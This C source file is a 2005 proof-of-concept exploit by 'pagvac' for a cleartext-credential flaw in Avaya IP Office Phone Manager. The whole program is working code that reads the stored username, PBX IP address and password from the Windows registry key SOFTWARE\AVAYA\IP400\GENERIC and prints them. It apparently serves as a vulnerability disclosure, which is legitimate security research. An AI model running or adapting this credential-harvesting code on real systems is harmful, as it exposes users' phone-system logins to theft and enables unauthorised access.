#include <windows.h>
#include <stdio.h>
#include <string.h>
/*
Filename: exploit.c
Title: Avaya IP Office Phone Manager - Cleartext Sensitive Data
Vulnerability
Exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 24th Feb, 2005
Other info: tested on version 2.013. Compile as a Win32 console
application
project in Visual C++
*/
BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
char lszResult[255];
HKEY hKey;
LONG returnStatus;
DWORD dwType=REG_SZ;
DWORD dwSize=255;
returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
if (returnStatus == ERROR_SUCCESS)
{
returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL,
&dwType,(LPBYTE)&lszResult, &dwSize);
if (returnStatus == ERROR_SUCCESS)
{
strcpy(lszValData, lszResult);
}
RegCloseKey(hKey);
return TRUE;
}
else
{
RegCloseKey(hKey);
return FALSE;
}
}
void main()
{
char valData[255];
printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data
Vulnerability Exploit\n");
printf("By pagvac (Adrian Pastor)\n");
printf("Tested on version 2.013\n\n");
// Print username
printf("Username:\t");
if(!QueryVal("UserName", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);
// Print IP address
printf("PBX IP Address:\t");
if(!QueryVal("PBXAddress", valData))
printf("Error! No permissions to read key value?\n");
else
printf("%s\n", valData);
// Print password
printf("Password:\t");
if(!QueryVal("Password", valData))
printf("Error! No permissions to read key value?\n");
else
{
if(strcmp(valData, "")==0)
printf("[blank password]\n\n");
else
{
printf("%s\n", valData);
printf("Password obsfucated?\n\n");
}
}
}
securitydot.net - 2005-02-24
|
